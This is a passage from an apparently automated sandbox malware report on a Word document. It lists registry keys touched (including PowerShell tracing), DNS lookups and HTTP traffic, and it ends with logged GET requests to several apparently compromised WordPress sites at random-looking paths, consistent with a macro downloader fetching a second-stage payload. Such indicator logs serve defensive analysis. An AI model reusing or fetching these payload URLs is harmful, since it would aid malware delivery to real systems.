2006. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\KaiTi",
2007. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Kalinga",
2008. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Kartika",
2009. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Khmer UI",
2010. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\KodchiangUPC",
2011. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Kokila",
2012. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Kristen ITC",
2013. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Kunstler Script",
2014. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Lao UI",
2015. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Latha",
2016. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Leelawadee",
2017. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Levenim MT",
2018. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\LilyUPC",
2019. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Lucida Bright",
2020. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Lucida Calligraphy",
2021. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Lucida Console",
2022. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Lucida Fax",
2023. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Lucida Handwriting",
2024. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Lucida Sans",
2025. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Lucida Sans Typewriter",
2026. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Lucida Sans Unicode",
2027. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Magneto",
2028. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Maiandra GD",
2029. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Malgun Gothic",
2030. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Mangal",
2031. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Marlett",
2032. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Matura MT Script Capitals",
2033. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Meiryo",
2034. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Meiryo UI",
2035. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Microsoft Himalaya",
2036. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Microsoft JhengHei",
2037. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Microsoft JhengHei UI",
2038. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Microsoft New Tai Lue",
2039. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Microsoft PhagsPa",
2040. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Microsoft Sans Serif",
2041. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Microsoft Tai Le",
2042. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Microsoft Uighur",
2043. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Microsoft YaHei",
2044. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Microsoft YaHei UI",
2045. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Microsoft Yi Baiti",
2046. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\MingLiU",
2047. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\MingLiU_HKSCS",
2048. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\MingLiU_HKSCS-ExtB",
2049. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\MingLiU-ExtB",
2050. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Miriam",
2051. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Miriam Fixed",
2052. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Mistral",
2053. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Modern No. 20",
2054. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Mongolian Baiti",
2055. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Monotype Corsiva",
2056. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\MoolBoran",
2057. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\MS Gothic",
2058. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\MS Mincho",
2059. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\MS Outlook",
2060. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\MS PGothic",
2061. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\MS PMincho",
2062. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\MS Reference Sans Serif",
2063. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\MS Reference Specialty",
2064. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\MS UI Gothic",
2065. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\MT Extra",
2066. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\MV Boli",
2067. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Narkisim",
2068. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Niagara Engraved",
2069. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Niagara Solid",
2070. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Nirmala UI",
2071. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\NSimSun",
2072. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Nyala",
2073. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\OCR A Extended",
2074. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Old English Text MT",
2075. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Onyx",
2076. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Palace Script MT",
2077. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Palatino Linotype",
2078. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Papyrus",
2079. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Parchment",
2080. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Perpetua",
2081. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Perpetua Titling MT",
2082. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Plantagenet Cherokee",
2083. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Playbill",
2084. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\PMingLiU",
2085. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\PMingLiU-ExtB",
2086. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Poor Richard",
2087. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Pristina",
2088. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Raavi",
2089. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Rage Italic",
2090. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Ravie",
2091. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Rockwell",
2092. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Rockwell Condensed",
2093. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Rockwell Extra Bold",
2094. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Rod",
2095. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Sakkal Majalla",
2096. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Script MT Bold",
2097. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Segoe Print",
2098. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Segoe Script",
2099. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Segoe UI",
2100. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Segoe UI Light",
2101. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Segoe UI Semibold",
2102. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Segoe UI Semilight",
2103. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Segoe UI Symbol",
2104. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Shonar Bangla",
2105. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Showcard Gothic",
2106. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Shruti",
2107. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\SimHei",
2108. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Simplified Arabic",
2109. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Simplified Arabic Fixed",
2110. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\SimSun",
2111. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\SimSun-ExtB",
2112. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Snap ITC",
2113. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Stencil",
2114. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Sylfaen",
2115. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Symbol",
2116. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Tahoma",
2117. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Tempus Sans ITC",
2118. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Times New Roman",
2119. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Traditional Arabic",
2120. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Trebuchet MS",
2121. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Tunga",
2122. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Tw Cen MT",
2123. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Tw Cen MT Condensed",
2124. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Tw Cen MT Condensed Extra Bold",
2125. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Utsaah",
2126. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Vani",
2127. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Verdana",
2128. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Vijaya",
2129. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Viner Hand ITC",
2130. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Vivaldi",
2131. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Vladimir Script",
2132. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Vrinda",
2133. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Webdings",
2134. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Wide Latin",
2135. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Wingdings",
2136. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Wingdings 2",
2137. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Wingdings 3",
2138. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Toolbars\\Settings\\Microsoft Word",
2139. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Reading Locations",
2140. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Reading Locations\\Document 0",
2141. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Reading Locations\\Document 0\\File Path",
2142. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Reading Locations\\Document 0\\Datetime",
2143. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Reading Locations\\Document 0\\Position",
2144. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\NextUpdate",
2145. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\LastUpdate",
2146. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocParts\\1033\\NextUpdate",
2147. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocParts\\1033\\LastUpdate",
2148. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\NextUpdate",
2149. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\LastUpdate",
2150. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\NextUpdate",
2151. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\LastUpdate",
2152. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Data\\Settings",
2153. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Options\\BackgroundOpen",
2154. "HKEY_CURRENT_USER\\Software\\Microsoft\\VBA\\7.1\\Common\\PropertiesWindow",
2155. "HKEY_CURRENT_USER\\Software\\Microsoft\\VBA\\7.1\\Common\\MainWindow",
2156. "HKEY_CURRENT_USER\\Software\\Microsoft\\VBA\\7.1\\Common\\MdiMaximized",
2157. "HKEY_CURRENT_USER\\Software\\Microsoft\\VBA\\7.1\\Common\\Dock",
2158. "HKEY_CURRENT_USER\\Software\\Microsoft\\VBA\\7.1\\Common\\FolderView",
2159. "HKEY_CURRENT_USER\\Software\\Microsoft\\VBA\\7.1\\Common\\Tool",
2160. "HKEY_CURRENT_USER\\Software\\Microsoft\\VBA\\7.1\\Common\\CtlsShowSelected",
2161. "HKEY_CURRENT_USER\\Software\\Microsoft\\VBA\\7.1\\Common\\DsnShowSelected",
2162. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\MTTF",
2163. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\MTTA",
2164. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Feedback\\AppUsageData_1",
2165. "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Tracing\\powErSHell_RASAPI32",
2166. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Tracing\\powErSHell_RASAPI32\\EnableFileTracing",
2167. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Tracing\\powErSHell_RASAPI32\\EnableConsoleTracing",
2168. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Tracing\\powErSHell_RASAPI32\\FileTracingMask",
2169. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Tracing\\powErSHell_RASAPI32\\ConsoleTracingMask",
2170. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Tracing\\powErSHell_RASAPI32\\MaxFileSize",
2171. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Tracing\\powErSHell_RASAPI32\\FileDirectory"
2172.  
2173.  
2174. * Deleted Registry Keys:
2175. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
2176. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
2177. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName",
2178. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName",
2179. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\StartupItems\\5-x",
2180. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\CacheReady",
2181. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\LastRequest",
2182. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\LastUpdate",
2183. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\NextUpdate",
2184. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\StartupItems\\oqv",
2185. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\DocumentRecovery\\14FF39A\\14FF39A",
2186. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\MTTT"
2187.  
2188.  
2189. * DNS Communications:
2190.  
2191. "type": "A",
2192. "request": "programmephenix.com",
2193. "answers":
2194.  
2195. "data": "134.209.172.96",
2196. "type": "A"
2197.  
2198.  
2199.  
2200.  
2201. "type": "A",
2202. "request": "axletime.com",
2203. "answers":
2204.  
2205. "data": "1511765.vhost121.wuxubeian.top",
2206. "type": "CNAME"
2207.  
2208.  
2209. "data": "210.209.84.190",
2210. "type": "A"
2211.  
2212.  
2213.  
2214.  
2215. "type": "A",
2216. "request": "5elements-development.com",
2217. "answers":
2218.  
2219. "data": "103.1.236.11",
2220. "type": "A"
2221.  
2222.  
2223.  
2224.  
2225. "type": "A",
2226. "request": "bestphotographytnj.com",
2227. "answers":
2228.  
2229. "data": "209.99.40.220",
2230. "type": "A"
2231.  
2232.  
2233.  
2234.  
2235. "type": "A",
2236. "request": "citilinesholdings.com",
2237. "answers":
2238.  
2239.  
2240.  
2241. * Domains:
2242.  
2243. "ip": "209.99.40.220",
2244. "domain": "bestphotographytnj.com"
2245.  
2246.  
2247. "ip": "",
2248. "domain": "citilinesholdings.com"
2249.  
2250.  
2251. "ip": "",
2252. "domain": "5elements-development.com"
2253.  
2254.  
2255. "ip": "210.209.84.190",
2256. "domain": "axletime.com"
2257.  
2258.  
2259. "ip": "134.209.172.96",
2260. "domain": "programmephenix.com"
2261.  
2262.  
2263.  
2264. * Network Communication - ICMP:
2265.  
2266. * Network Communication - HTTP:
2267.  
2268. "count": 1,
2269. "body": "",
2270. "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAi4elAbvpzaLRZNPjlRv1U%3D",
2271. "user-agent": "Microsoft-CryptoAPI/6.1",
2272. "method": "GET",
2273. "host": "ocsp.digicert.com",
2274. "version": "1.1",
2275. "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAi4elAbvpzaLRZNPjlRv1U%3D",
2276. "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAi4elAbvpzaLRZNPjlRv1U%3D HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
2277. "port": 80
2278.  
2279.  
2280. "count": 1,
2281. "body": "",
2282. "uri": "http://ocsp.msocsp.com/MFQwUjBQME4wTDAJBgUrDgMCGgUABBRPC1vZt9qvn7bzY3Iidtbhla4mKQQUWIif1tycSCK3FD7%2FhIjo5oX%2F%2Bn0CE3sAAGyvV14%2FmEPDgh0AAAAAbK8%3D",
2283. "user-agent": "Microsoft-CryptoAPI/6.1",
2284. "method": "GET",
2285. "host": "ocsp.msocsp.com",
2286. "version": "1.1",
2287. "path": "/MFQwUjBQME4wTDAJBgUrDgMCGgUABBRPC1vZt9qvn7bzY3Iidtbhla4mKQQUWIif1tycSCK3FD7%2FhIjo5oX%2F%2Bn0CE3sAAGyvV14%2FmEPDgh0AAAAAbK8%3D",
2288. "data": "GET /MFQwUjBQME4wTDAJBgUrDgMCGgUABBRPC1vZt9qvn7bzY3Iidtbhla4mKQQUWIif1tycSCK3FD7%2FhIjo5oX%2F%2Bn0CE3sAAGyvV14%2FmEPDgh0AAAAAbK8%3D HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Sat, 23 Mar 2019 17:46:18 GMT\r\nIf-None-Match: \"dd54d75d4688b8dc62b087df4e04af258704c48b\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.msocsp.com\r\n\r\n",
2289. "port": 80
2290.  
2291.  
2292. "count": 7,
2293. "body": "",
2294. "uri": "http://crl.microsoft.com/pki/crl/products/microsoftrootcert.crl",
2295. "user-agent": "Microsoft-CryptoAPI/6.1",
2296. "method": "GET",
2297. "host": "crl.microsoft.com",
2298. "version": "1.1",
2299. "path": "/pki/crl/products/microsoftrootcert.crl",
2300. "data": "GET /pki/crl/products/microsoftrootcert.crl HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Thu, 07 Mar 2019 06:00:16 GMT\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: crl.microsoft.com\r\n\r\n",
2301. "port": 80
2302.  
2303.  
2304. "count": 1,
2305. "body": "",
2306. "uri": "http://crl.microsoft.com/pki/crl/products/MicCodSigPCA_08-31-2010.crl",
2307. "user-agent": "Microsoft-CryptoAPI/6.1",
2308. "method": "GET",
2309. "host": "crl.microsoft.com",
2310. "version": "1.1",
2311. "path": "/pki/crl/products/MicCodSigPCA_08-31-2010.crl",
2312. "data": "GET /pki/crl/products/MicCodSigPCA_08-31-2010.crl HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Thu, 14 Feb 2019 06:01:18 GMT\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: crl.microsoft.com\r\n\r\n",
2313. "port": 80
2314.  
2315.  
2316. "count": 3,
2317. "body": "",
2318. "uri": "http://crl.microsoft.com/pki/crl/products/MicrosoftTimeStampPCA.crl",
2319. "user-agent": "Microsoft-CryptoAPI/6.1",
2320. "method": "GET",
2321. "host": "crl.microsoft.com",
2322. "version": "1.1",
2323. "path": "/pki/crl/products/MicrosoftTimeStampPCA.crl",
2324. "data": "GET /pki/crl/products/MicrosoftTimeStampPCA.crl HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: crl.microsoft.com\r\n\r\n",
2325. "port": 80
2326.  
2327.  
2328. "count": 1,
2329. "body": "",
2330. "uri": "http://crl.microsoft.com/pki/crl/products/MicrosoftTimeStampPCA.crl",
2331. "user-agent": "Microsoft-CryptoAPI/6.1",
2332. "method": "GET",
2333. "host": "crl.microsoft.com",
2334. "version": "1.1",
2335. "path": "/pki/crl/products/MicrosoftTimeStampPCA.crl",
2336. "data": "GET /pki/crl/products/MicrosoftTimeStampPCA.crl HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Thu, 18 Jul 2019 05:00:49 GMT\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: crl.microsoft.com\r\n\r\n",
2337. "port": 80
2338.  
2339.  
2340. "count": 1,
2341. "body": "",
2342. "uri": "http://programmephenix.com/wp-content/languages/kjdx0ls2/",
2343. "user-agent": "",
2344. "method": "GET",
2345. "host": "programmephenix.com",
2346. "version": "1.1",
2347. "path": "/wp-content/languages/kjdx0ls2/",
2348. "data": "GET /wp-content/languages/kjdx0ls2/ HTTP/1.1\r\nHost: programmephenix.com\r\nConnection: Keep-Alive\r\n\r\n",
2349. "port": 80
2350.  
2351.  
2352. "count": 1,
2353. "body": "",
2354. "uri": "http://axletime.com/wp-admin/r0gmx40208/",
2355. "user-agent": "",
2356. "method": "GET",
2357. "host": "axletime.com",
2358. "version": "1.1",
2359. "path": "/wp-admin/r0gmx40208/",
2360. "data": "GET /wp-admin/r0gmx40208/ HTTP/1.1\r\nHost: axletime.com\r\nConnection: Keep-Alive\r\n\r\n",
2361. "port": 80
2362.  
2363.  
2364. "count": 1,
2365. "body": "",
2366. "uri": "http://5elements-development.com/wp-content/uoesp16/",
2367. "user-agent": "",
2368. "method": "GET",
2369. "host": "5elements-development.com",
2370. "version": "1.1",
2371. "path": "/wp-content/uoesp16/",
2372. "data": "GET /wp-content/uoesp16/ HTTP/1.1\r\nHost: 5elements-development.com\r\nConnection: Keep-Alive\r\n\r\n",
2373. "port": 80
2374.  
2375.  
2376. "count": 1,
2377. "body": "",
2378. "uri": "http://bestphotographytnj.com/rrm9/lm83yx518/",
2379. "user-agent": "",
2380. "method": "GET",
2381. "host": "bestphotographytnj.com",
2382. "version": "1.1",
2383. "path": "/rrm9/lm83yx518/",
2384. "data": "GET /rrm9/lm83yx518/ HTTP/1.1\r\nHost: bestphotographytnj.com\r\nConnection: Keep-Alive\r\n\r\n",
2385. "port": 80
2386.  
2387.  
2388.  
2389. * Network Communication - SMTP:
2390.  
2391. * Network Communication - Hosts:
2392.  
2393. * Network Communication - IRC: